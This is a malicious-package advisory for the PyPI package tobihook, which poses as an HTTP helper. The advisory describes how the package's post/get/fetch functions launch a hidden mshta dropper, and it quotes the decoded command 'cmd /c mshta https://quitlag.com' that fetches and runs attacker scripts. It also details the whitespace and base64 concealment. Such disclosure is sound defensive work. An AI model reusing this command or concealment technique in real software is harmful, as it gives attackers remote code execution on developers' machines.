MAL-2026-5995
Dashboard / Malicious Package / MAL-2026-5995
MAL-2026-5995
Summary: Malicious code in tobihook (PyPI)
Details: Source: amazon-inspector (2c093ec7049ebbe26ca860033bc1fd81ad98f4f586b66fc68170e1ff81ae90bb) The package masquerades as an HTTP helper (functions named post/get/fetch, module comment '# request/__init__.py', and an unused requests dependency) but each of those functions base64-decodes the string 'cmd /c mshta https://quitlag.com' and launches it via subprocess.Popen with CREATE_NO_WINDOW on Windows. mshta.exe then fetches and executes attacker-controlled HTA/JavaScript from quitlag.com on the caller's machine with no visible window. The malicious code is concealed in tobihook/post.py behind roughly 400 lines of leading whitespace and base64 obfuscation, and the dropper is reachable from the package's documented top-level API (tobihook/__init__.py re-exports post). Any developer who installs tobihook and calls its advertised post()/get()/fetch() triggers remote code execution on a Windows host. Source: kam193 (052494dbc6267dbb289d7f0459188ecce627e3c3eb1d7a8892795003ff8bff53) Code contains lightly obfuscated commands executing remote scripts using mshta utility. The code does not contain any different functionality and the target URL is already flagged as potentially dangerous. Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers. Campaign: 2026-06-tobihook Reasons (based on the campaign): - Downloads and executes a remote malicious script. - tool:mshta - obfuscation
References: https://pypi.org/project/tobihook/1.0.4/, https://urlscan.io/result/019ea71c-9937-7139-a2f7-8ede7361bd72/, https://bad-packages.kam193.eu/pypi/package/tobihook
Affected packages
Package
Name: tobihook
Purl: pkg:pypi/tobihook
Affected ranges
Type: N/A
Events:
